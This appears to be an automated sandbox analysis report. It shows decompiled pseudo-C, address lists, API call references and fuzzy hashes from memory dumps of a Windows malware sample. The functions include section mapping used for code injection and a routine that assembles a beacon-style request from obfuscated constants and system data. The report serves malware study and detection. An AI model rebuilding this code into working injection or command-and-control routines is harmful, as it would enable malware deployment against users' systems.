                                                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                                                            0x004014f1
                                                                                                                                                                                                                                                            0x004014f8
                                                                                                                                                                                                                                                            0x004014f9
                                                                                                                                                                                                                                                            0x004014fa
                                                                                                                                                                                                                                                            0x004014fb
                                                                                                                                                                                                                                                            0x004014fc
                                                                                                                                                                                                                                                            0x0040150d
                                                                                                                                                                                                                                                            0x00401511
                                                                                                                                                                                                                                                            0x00401525
                                                                                                                                                                                                                                                            0x00401528
                                                                                                                                                                                                                                                            0x0040152b
                                                                                                                                                                                                                                                            0x00401532
                                                                                                                                                                                                                                                            0x00401535
                                                                                                                                                                                                                                                            0x0040153c
                                                                                                                                                                                                                                                            0x0040153f
                                                                                                                                                                                                                                                            0x00401542
                                                                                                                                                                                                                                                            0x00401545
                                                                                                                                                                                                                                                            0x0040154a
                                                                                                                                                                                                                                                            0x00401585
                                                                                                                                                                                                                                                            0x0040154c
                                                                                                                                                                                                                                                            0x0040154f
                                                                                                                                                                                                                                                            0x00401555
                                                                                                                                                                                                                                                            0x0040155a
                                                                                                                                                                                                                                                            0x0040155e
                                                                                                                                                                                                                                                            0x0040157c
                                                                                                                                                                                                                                                            0x00401560
                                                                                                                                                                                                                                                            0x00401567
                                                                                                                                                                                                                                                            0x00401575
                                                                                                                                                                                                                                                            0x00401575
                                                                                                                                                                                                                                                            0x0040155e
                                                                                                                                                                                                                                                            0x0040158d

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000), ref: 00401545
                                                                                                                                                                                                                                                              • Part of subcall function 0040183B: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,?,?,00000002,00000000,?,?,00000000), ref: 00401868
                                                                                                                                                                                                                                                            • memset.NTDLL ref: 00401567
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1036254659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1036280390.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Section$CreateViewmemset
                                                                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                                                                            • API String ID: 2533685722-2766056989
                                                                                                                                                                                                                                                            • Opcode ID: efff15d90688c01bb992f58e57ed5d8284d442e7059bc5e9d576db37d726a1b0
                                                                                                                                                                                                                                                            • Instruction ID: 20315c5e05caff208afada9607e14f7ad6532b381dfdf1539f18be6e55008277
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: efff15d90688c01bb992f58e57ed5d8284d442e7059bc5e9d576db37d726a1b0
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E6211DB6D00209AFCB11DFA9C8849EEFBB9EF48354F10453AE546F7250D7349A458BA4
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 68%
                                                                                                                                                                                                                                                            			E0040183B(void** __esi, PVOID* _a4) {
                                                                                                                                                                                                                                                            				long _v8;
                                                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                                                            				void* _v16;
                                                                                                                                                                                                                                                            				long _t13;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_v16 = 0;
                                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                            				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                                                                                                                                                                                                                                                            				if(_t13 < 0) {
                                                                                                                                                                                                                                                            					_push(_t13);
                                                                                                                                                                                                                                                            					return __esi[6]();
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                                                            0x0040184d
                                                                                                                                                                                                                                                            0x00401853
                                                                                                                                                                                                                                                            0x00401861
                                                                                                                                                                                                                                                            0x00401868
                                                                                                                                                                                                                                                            0x0040186d
                                                                                                                                                                                                                                                            0x00401873
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00401874
                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,?,?,00000002,00000000,?,?,00000000), ref: 00401868
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1036254659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1036280390.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: SectionView
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1323581903-0
                                                                                                                                                                                                                                                            • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                                                                                                                                                            • Instruction ID: e9e7058d2aee64d781f65b36f2bf56970762c5979d99ac537d3efffef246f7b2
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E3F019B650020CBFD7119FA5CC85C9FBBBDEB44354B104939B552E10A0D630DE089A61
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 74%
                                                                                                                                                                                                                                                            			E04871D67(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
                                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                                                            				void* _v16;
                                                                                                                                                                                                                                                            				void* _v20;
                                                                                                                                                                                                                                                            				void* _v24;
                                                                                                                                                                                                                                                            				void* _v28;
                                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                                            				long _t59;
                                                                                                                                                                                                                                                            				intOrPtr _t60;
                                                                                                                                                                                                                                                            				intOrPtr _t61;
                                                                                                                                                                                                                                                            				intOrPtr _t62;
                                                                                                                                                                                                                                                            				intOrPtr _t63;
                                                                                                                                                                                                                                                            				intOrPtr _t64;
                                                                                                                                                                                                                                                            				void* _t67;
                                                                                                                                                                                                                                                            				intOrPtr _t68;
                                                                                                                                                                                                                                                            				int _t71;
                                                                                                                                                                                                                                                            				void* _t72;
                                                                                                                                                                                                                                                            				void* _t73;
                                                                                                                                                                                                                                                            				void* _t75;
                                                                                                                                                                                                                                                            				void* _t78;
                                                                                                                                                                                                                                                            				intOrPtr _t82;
                                                                                                                                                                                                                                                            				intOrPtr _t86;
                                                                                                                                                                                                                                                            				intOrPtr* _t88;
                                                                                                                                                                                                                                                            				void* _t94;
                                                                                                                                                                                                                                                            				intOrPtr _t101;
                                                                                                                                                                                                                                                            				signed int _t105;
                                                                                                                                                                                                                                                            				char** _t107;
                                                                                                                                                                                                                                                            				int _t110;
                                                                                                                                                                                                                                                            				signed int _t112;
                                                                                                                                                                                                                                                            				intOrPtr* _t113;
                                                                                                                                                                                                                                                            				intOrPtr* _t115;
                                                                                                                                                                                                                                                            				intOrPtr* _t117;
                                                                                                                                                                                                                                                            				intOrPtr* _t119;
                                                                                                                                                                                                                                                            				intOrPtr _t122;
                                                                                                                                                                                                                                                            				intOrPtr _t127;
                                                                                                                                                                                                                                                            				int _t131;
                                                                                                                                                                                                                                                            				CHAR* _t133;
                                                                                                                                                                                                                                                            				intOrPtr _t134;
                                                                                                                                                                                                                                                            				void* _t135;
                                                                                                                                                                                                                                                            				void* _t144;
                                                                                                                                                                                                                                                            				int _t145;
                                                                                                                                                                                                                                                            				void* _t146;
                                                                                                                                                                                                                                                            				intOrPtr _t147;
                                                                                                                                                                                                                                                            				void* _t149;
                                                                                                                                                                                                                                                            				long _t153;
                                                                                                                                                                                                                                                            				intOrPtr* _t154;
                                                                                                                                                                                                                                                            				intOrPtr* _t155;
                                                                                                                                                                                                                                                            				intOrPtr* _t158;
                                                                                                                                                                                                                                                            				void* _t159;
                                                                                                                                                                                                                                                            				void* _t161;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t144 = __edx;
                                                                                                                                                                                                                                                            				_t135 = __ecx;
                                                                                                                                                                                                                                                            				_t59 = __eax;
                                                                                                                                                                                                                                                            				_v12 = 8;
                                                                                                                                                                                                                                                            				if(__eax == 0) {
                                                                                                                                                                                                                                                            					_t59 = GetTickCount();
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_t60 =  *0x487d018; // 0x9300c086
                                                                                                                                                                                                                                                            				asm("bswap eax");
                                                                                                                                                                                                                                                            				_t61 =  *0x487d014; // 0x3a87c8cd
                                                                                                                                                                                                                                                            				_t133 = _a16;
                                                                                                                                                                                                                                                            				asm("bswap eax");
                                                                                                                                                                                                                                                            				_t62 =  *0x487d010; // 0xd8d2f808
                                                                                                                                                                                                                                                            				asm("bswap eax");
                                                                                                                                                                                                                                                            				_t63 =  *0x487d00c; // 0x81762942
                                                                                                                                                                                                                                                            				asm("bswap eax");
                                                                                                                                                                                                                                                            				_t64 =  *0x487d27c; // 0x9da5a8
                                                                                                                                                                                                                                                            				_t3 = _t64 + 0x487e633; // 0x74666f73
                                                                                                                                                                                                                                                            				_t145 = wsprintfA(_t133, _t3, 3, 0x3d141, _t63, _t62, _t61, _t60,  *0x487d02c,  *0x487d004, _t59);
                                                                                                                                                                                                                                                            				_t67 = E04874077();
                                                                                                                                                                                                                                                            				_t68 =  *0x487d27c; // 0x9da5a8
                                                                                                                                                                                                                                                            				_t4 = _t68 + 0x487e673; // 0x74707526
                                                                                                                                                                                                                                                            				_t71 = wsprintfA(_t145 + _t133, _t4, _t67);
                                                                                                                                                                                                                                                            				_t161 = _t159 + 0x38;
                                                                                                                                                                                                                                                            				_t146 = _t145 + _t71; // executed
                                                                                                                                                                                                                                                            				_t72 = E04873CCD(_t135); // executed
                                                                                                                                                                                                                                                            				_t134 = __imp__;
                                                                                                                                                                                                                                                            				_v8 = _t72;
                                                                                                                                                                                                                                                            				if(_t72 != 0) {
                                                                                                                                                                                                                                                            					_t127 =  *0x487d27c; // 0x9da5a8
                                                                                                                                                                                                                                                            					_t7 = _t127 + 0x487e8eb; // 0x736e6426
                                                                                                                                                                                                                                                            					_t131 = wsprintfA(_a16 + _t146, _t7, _t72);
                                                                                                                                                                                                                                                            					_t161 = _t161 + 0xc;
                                                                                                                                                                                                                                                            					_t146 = _t146 + _t131;
                                                                                                                                                                                                                                                            					HeapFree( *0x487d238, 0, _v8);
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_t73 = E04873F90();
                                                                                                                                                                                                                                                            				_v8 = _t73;
                                                                                                                                                                                                                                                            				if(_t73 != 0) {
                                                                                                                                                                                                                                                            					_t122 =  *0x487d27c; // 0x9da5a8
                                                                                                                                                                                                                                                            					_t11 = _t122 + 0x487e8f3; // 0x6f687726
                                                                                                                                                                                                                                                            					wsprintfA(_t146 + _a16, _t11, _t73);
                                                                                                                                                                                                                                                            					_t161 = _t161 + 0xc;
                                                                                                                                                                                                                                                            					HeapFree( *0x487d238, 0, _v8);
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_t147 =  *0x487d324; // 0x52595b0
                                                                                                                                                                                                                                                            				_t75 = E04871203(0x487d00a, _t147 + 4);
                                                                                                                                                                                                                                                            				_t153 = 0;
                                                                                                                                                                                                                                                            				_v20 = _t75;
                                                                                                                                                                                                                                                            				if(_t75 == 0) {
                                                                                                                                                                                                                                                            					L26:
                                                                                                                                                                                                                                                            					RtlFreeHeap( *0x487d238, _t153, _a16); // executed
                                                                                                                                                                                                                                                            					return _v12;
                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                            					_t78 = RtlAllocateHeap( *0x487d238, 0, 0x800);
                                                                                                                                                                                                                                                            					_v8 = _t78;
                                                                                                                                                                                                                                                            					if(_t78 == 0) {
                                                                                                                                                                                                                                                            						L25:
                                                                                                                                                                                                                                                            						HeapFree( *0x487d238, _t153, _v20);
                                                                                                                                                                                                                                                            						goto L26;
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					E048786C4(GetTickCount());
                                                                                                                                                                                                                                                            					_t82 =  *0x487d324; // 0x52595b0
                                                                                                                                                                                                                                                            					__imp__(_t82 + 0x40);
                                                                                                                                                                                                                                                            					asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                                                            					_t86 =  *0x487d324; // 0x52595b0
                                                                                                                                                                                                                                                            					__imp__(_t86 + 0x40);
                                                                                                                                                                                                                                                            					_t88 =  *0x487d324; // 0x52595b0
                                                                                                                                                                                                                                                            					_t149 = E04876AB0(1, _t144, _a16,  *_t88);
                                                                                                                                                                                                                                                            					_v28 = _t149;
                                                                                                                                                                                                                                                            					asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                                                            					if(_t149 == 0) {
                                                                                                                                                                                                                                                            						L24:
                                                                                                                                                                                                                                                            						HeapFree( *0x487d238, _t153, _v8);
                                                                                                                                                                                                                                                            						goto L25;
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					StrTrimA(_t149, 0x487c2a4);
                                                                                                                                                                                                                                                            					_push(_t149);
                                                                                                                                                                                                                                                            					_t94 = E04874561();
                                                                                                                                                                                                                                                            					_v16 = _t94;
                                                                                                                                                                                                                                                            					if(_t94 == 0) {
                                                                                                                                                                                                                                                            						L23:
                                                                                                                                                                                                                                                            						HeapFree( *0x487d238, _t153, _t149);
                                                                                                                                                                                                                                                            						goto L24;
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					_t154 = __imp__;
                                                                                                                                                                                                                                                            					 *_t154(_t149, _a4);
                                                                                                                                                                                                                                                            					 *_t154(_v8, _v20);
                                                                                                                                                                                                                                                            					_t155 = __imp__;
                                                                                                                                                                                                                                                            					 *_t155(_v8, _v16);
                                                                                                                                                                                                                                                            					 *_t155(_v8, _t149);
                                                                                                                                                                                                                                                            					_t101 = E0487A0DB(0, _v8);
                                                                                                                                                                                                                                                            					_a4 = _t101;
                                                                                                                                                                                                                                                            					if(_t101 == 0) {
                                                                                                                                                                                                                                                            						_v12 = 8;
                                                                                                                                                                                                                                                            						L21:
                                                                                                                                                                                                                                                            						E04879E85();
                                                                                                                                                                                                                                                            						L22:
                                                                                                                                                                                                                                                            						HeapFree( *0x487d238, 0, _v16);
                                                                                                                                                                                                                                                            						_t153 = 0;
                                                                                                                                                                                                                                                            						goto L23;
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					_t105 = E04878954(_t134, 0xffffffffffffffff, _t149,  &_v24); // executed
                                                                                                                                                                                                                                                            					_v12 = _t105;
                                                                                                                                                                                                                                                            					if(_t105 == 0) {
                                                                                                                                                                                                                                                            						_t158 = _v24;
                                                                                                                                                                                                                                                            						_t112 = E0487A727(_t158, _a4, _a8, _a12); // executed
                                                                                                                                                                                                                                                            						_v12 = _t112;
                                                                                                                                                                                                                                                            						_t113 =  *((intOrPtr*)(_t158 + 8));
                                                                                                                                                                                                                                                            						 *((intOrPtr*)( *_t113 + 0x80))(_t113);
                                                                                                                                                                                                                                                            						_t115 =  *((intOrPtr*)(_t158 + 8));
                                                                                                                                                                                                                                                            						 *((intOrPtr*)( *_t115 + 8))(_t115);
                                                                                                                                                                                                                                                            						_t117 =  *((intOrPtr*)(_t158 + 4));
                                                                                                                                                                                                                                                            						 *((intOrPtr*)( *_t117 + 8))(_t117);
                                                                                                                                                                                                                                                            						_t119 =  *_t158;
                                                                                                                                                                                                                                                            						 *((intOrPtr*)( *_t119 + 8))(_t119);
                                                                                                                                                                                                                                                            						E048770FF(_t158);
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					if(_v12 != 0x10d2) {
                                                                                                                                                                                                                                                            						L16:
                                                                                                                                                                                                                                                            						if(_v12 == 0) {
                                                                                                                                                                                                                                                            							_t107 = _a8;
                                                                                                                                                                                                                                                            							if(_t107 != 0) {
                                                                                                                                                                                                                                                            								_t150 =  *_t107;
                                                                                                                                                                                                                                                            								_t156 =  *_a12;
                                                                                                                                                                                                                                                            								wcstombs( *_t107,  *_t107,  *_a12);
                                                                                                                                                                                                                                                            								_t110 = E04873BBA(_t150, _t150, _t156 >> 1);
                                                                                                                                                                                                                                                            								_t149 = _v28;
                                                                                                                                                                                                                                                            								 *_a12 = _t110;
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						goto L19;
                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                            						if(_a8 != 0) {
                                                                                                                                                                                                                                                            							L19:
                                                                                                                                                                                                                                                            							E048770FF(_a4);
                                                                                                                                                                                                                                                            							if(_v12 == 0 || _v12 == 0x10d2) {
                                                                                                                                                                                                                                                            								goto L22;
                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                            								goto L21;
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                                                                            						goto L16;
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            			}






















































                                                                                                                                                                                                                                                            0x04871d67
                                                                                                                                                                                                                                                            0x04871d67
                                                                                                                                                                                                                                                            0x04871d67
                                                                                                                                                                                                                                                            0x04871d72
                                                                                                                                                                                                                                                            0x04871d79
                                                                                                                                                                                                                                                            0x04871d7b
                                                                                                                                                                                                                                                            0x04871d7b
                                                                                                                                                                                                                                                            0x04871d88
                                                                                                                                                                                                                                                            0x04871d93
                                                                                                                                                                                                                                                            0x04871d96
                                                                                                                                                                                                                                                            0x04871d9b
                                                                                                                                                                                                                                                            0x04871da4
                                                                                                                                                                                                                                                            0x04871da7
                                                                                                                                                                                                                                                            0x04871dac
                                                                                                                                                                                                                                                            0x04871daf
                                                                                                                                                                                                                                                            0x04871db4
                                                                                                                                                                                                                                                            0x04871db7
                                                                                                                                                                                                                                                            0x04871dc3
                                                                                                                                                                                                                                                            0x04871dd0
                                                                                                                                                                                                                                                            0x04871dd2
                                                                                                                                                                                                                                                            0x04871dd8
                                                                                                                                                                                                                                                            0x04871ddd
                                                                                                                                                                                                                                                            0x04871de8
                                                                                                                                                                                                                                                            0x04871dea
                                                                                                                                                                                                                                                            0x04871ded
                                                                                                                                                                                                                                                            0x04871def
                                                                                                                                                                                                                                                            0x04871df6
                                                                                                                                                                                                                                                            0x04871dfc
                                                                                                                                                                                                                                                            0x04871dff
                                                                                                                                                                                                                                                            0x04871e02
                                                                                                                                                                                                                                                            0x04871e07
                                                                                                                                                                                                                                                            0x04871e14
                                                                                                                                                                                                                                                            0x04871e16
                                                                                                                                                                                                                                                            0x04871e1c
                                                                                                                                                                                                                                                            0x04871e26
                                                                                                                                                                                                                                                            0x04871e26
                                                                                                                                                                                                                                                            0x04871e28
                                                                                                                                                                                                                                                            0x04871e2f
                                                                                                                                                                                                                                                            0x04871e32
                                                                                                                                                                                                                                                            0x04871e35
                                                                                                                                                                                                                                                            0x04871e3a
                                                                                                                                                                                                                                                            0x04871e47
                                                                                                                                                                                                                                                            0x04871e49
                                                                                                                                                                                                                                                            0x04871e57
                                                                                                                                                                                                                                                            0x04871e57
                                                                                                                                                                                                                                                            0x04871e59
                                                                                                                                                                                                                                                            0x04871e67
                                                                                                                                                                                                                                                            0x04871e6c
                                                                                                                                                                                                                                                            0x04871e70
                                                                                                                                                                                                                                                            0x04871e73
                                                                                                                                                                                                                                                            0x04872036
                                                                                                                                                                                                                                                            0x04872040
                                                                                                                                                                                                                                                            0x04872049
                                                                                                                                                                                                                                                            0x04871e79
                                                                                                                                                                                                                                                            0x04871e85
                                                                                                                                                                                                                                                            0x04871e8d
                                                                                                                                                                                                                                                            0x04871e90
                                                                                                                                                                                                                                                            0x0487202a
                                                                                                                                                                                                                                                            0x04872034
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x04872034
                                                                                                                                                                                                                                                            0x04871e9c
                                                                                                                                                                                                                                                            0x04871ea1
                                                                                                                                                                                                                                                            0x04871eaa
                                                                                                                                                                                                                                                            0x04871ebb
                                                                                                                                                                                                                                                            0x04871ebf
                                                                                                                                                                                                                                                            0x04871ec8
                                                                                                                                                                                                                                                            0x04871ece
                                                                                                                                                                                                                                                            0x04871edd
                                                                                                                                                                                                                                                            0x04871ee4
                                                                                                                                                                                                                                                            0x04871eed
                                                                                                                                                                                                                                                            0x04871ef3
                                                                                                                                                                                                                                                            0x0487201e
                                                                                                                                                                                                                                                            0x04872028
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x04872028
                                                                                                                                                                                                                                                            0x04871eff
                                                                                                                                                                                                                                                            0x04871f05
                                                                                                                                                                                                                                                            0x04871f06
                                                                                                                                                                                                                                                            0x04871f0d
                                                                                                                                                                                                                                                            0x04871f10
                                                                                                                                                                                                                                                            0x04872014
                                                                                                                                                                                                                                                            0x0487201c
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487201c
                                                                                                                                                                                                                                                            0x04871f19
                                                                                                                                                                                                                                                            0x04871f20
                                                                                                                                                                                                                                                            0x04871f28
                                                                                                                                                                                                                                                            0x04871f2d
                                                                                                                                                                                                                                                            0x04871f36
                                                                                                                                                                                                                                                            0x04871f3c
                                                                                                                                                                                                                                                            0x04871f43
                                                                                                                                                                                                                                                            0x04871f4a
                                                                                                                                                                                                                                                            0x04871f4d
                                                                                                                                                                                                                                                            0x0487204c
                                                                                                                                                                                                                                                            0x04872000
                                                                                                                                                                                                                                                            0x04872000
                                                                                                                                                                                                                                                            0x04872005
                                                                                                                                                                                                                                                            0x04872010
                                                                                                                                                                                                                                                            0x04872012
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x04872012
                                                                                                                                                                                                                                                            0x04871f57
                                                                                                                                                                                                                                                            0x04871f5e
                                                                                                                                                                                                                                                            0x04871f61
                                                                                                                                                                                                                                                            0x04871f66
                                                                                                                                                                                                                                                            0x04871f71
                                                                                                                                                                                                                                                            0x04871f76
                                                                                                                                                                                                                                                            0x04871f79
                                                                                                                                                                                                                                                            0x04871f7f
                                                                                                                                                                                                                                                            0x04871f85
                                                                                                                                                                                                                                                            0x04871f8b
                                                                                                                                                                                                                                                            0x04871f8e
                                                                                                                                                                                                                                                            0x04871f94
                                                                                                                                                                                                                                                            0x04871f97
                                                                                                                                                                                                                                                            0x04871f9c
                                                                                                                                                                                                                                                            0x04871fa0
                                                                                                                                                                                                                                                            0x04871fa0
                                                                                                                                                                                                                                                            0x04871fac
                                                                                                                                                                                                                                                            0x04871fb8
                                                                                                                                                                                                                                                            0x04871fbc
                                                                                                                                                                                                                                                            0x04871fbe
                                                                                                                                                                                                                                                            0x04871fc3
                                                                                                                                                                                                                                                            0x04871fc5
                                                                                                                                                                                                                                                            0x04871fca
                                                                                                                                                                                                                                                            0x04871fcf
                                                                                                                                                                                                                                                            0x04871fdc
                                                                                                                                                                                                                                                            0x04871fe4
                                                                                                                                                                                                                                                            0x04871fe7
                                                                                                                                                                                                                                                            0x04871fe7
                                                                                                                                                                                                                                                            0x04871fc3
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x04871fae
                                                                                                                                                                                                                                                            0x04871fb2
                                                                                                                                                                                                                                                            0x04871fe9
                                                                                                                                                                                                                                                            0x04871fec
                                                                                                                                                                                                                                                            0x04871ff5
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x04871ff5
                                                                                                                                                                                                                                                            0x04871fb4
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x04871fb4
                                                                                                                                                                                                                                                            0x04871fac

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 04871D7B
                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 04871DCB
                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 04871DE8
                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 04871E14
                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?), ref: 04871E26
                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 04871E47
                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?), ref: 04871E57
                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04871E85
                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 04871E96
                                                                                                                                                                                                                                                            • RtlEnterCriticalSection.NTDLL(05259570), ref: 04871EAA
                                                                                                                                                                                                                                                            • RtlLeaveCriticalSection.NTDLL(05259570), ref: 04871EC8
                                                                                                                                                                                                                                                              • Part of subcall function 04876AB0: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,745EC740,?,?,04878ED2,?,052595B0), ref: 04876ADB
                                                                                                                                                                                                                                                              • Part of subcall function 04876AB0: lstrlen.KERNEL32(?,?,?,04878ED2,?,052595B0), ref: 04876AE3
                                                                                                                                                                                                                                                              • Part of subcall function 04876AB0: strcpy.NTDLL ref: 04876AFA
                                                                                                                                                                                                                                                              • Part of subcall function 04876AB0: lstrcat.KERNEL32(00000000,?), ref: 04876B05
                                                                                                                                                                                                                                                              • Part of subcall function 04876AB0: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04878ED2,?,052595B0), ref: 04876B22
                                                                                                                                                                                                                                                            • StrTrimA.SHLWAPI(00000000,0487C2A4,?,052595B0), ref: 04871EFF
                                                                                                                                                                                                                                                              • Part of subcall function 04874561: lstrlen.KERNEL32(052587FA,00000000,00000000,745EC740,04878EFD,00000000), ref: 04874571
                                                                                                                                                                                                                                                              • Part of subcall function 04874561: lstrlen.KERNEL32(?), ref: 04874579
                                                                                                                                                                                                                                                              • Part of subcall function 04874561: lstrcpy.KERNEL32(00000000,052587FA), ref: 0487458D
                                                                                                                                                                                                                                                              • Part of subcall function 04874561: lstrcat.KERNEL32(00000000,?), ref: 04874598
                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(00000000,?), ref: 04871F20
                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,?), ref: 04871F28
                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,?), ref: 04871F36
                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,00000000), ref: 04871F3C
                                                                                                                                                                                                                                                              • Part of subcall function 0487A0DB: lstrlen.KERNEL32(?,00000000,0487D330,00000001,048722CC,0487D00C,0487D00C,00000000,00000005,00000000,00000000,?,?,?,04877E0E,048791A4), ref: 0487A0E4
                                                                                                                                                                                                                                                              • Part of subcall function 0487A0DB: mbstowcs.NTDLL ref: 0487A10B
                                                                                                                                                                                                                                                              • Part of subcall function 0487A0DB: memset.NTDLL ref: 0487A11D
                                                                                                                                                                                                                                                            • wcstombs.NTDLL ref: 04871FCF
                                                                                                                                                                                                                                                              • Part of subcall function 0487A727: SysAllocString.OLEAUT32(?), ref: 0487A768
                                                                                                                                                                                                                                                              • Part of subcall function 0487A727: IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,?), ref: 0487A7EA
                                                                                                                                                                                                                                                              • Part of subcall function 0487A727: StrStrIW.SHLWAPI(?,006E0069), ref: 0487A829
                                                                                                                                                                                                                                                              • Part of subcall function 048770FF: HeapFree.KERNEL32(00000000,00000000,04871545,00000000,?,?,00000000), ref: 0487710B
                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?), ref: 04872010
                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0487201C
                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,052595B0), ref: 04872028
                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?), ref: 04872034
                                                                                                                                                                                                                                                            • RtlFreeHeap.NTDLL(00000000,?), ref: 04872040
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 603507560-0
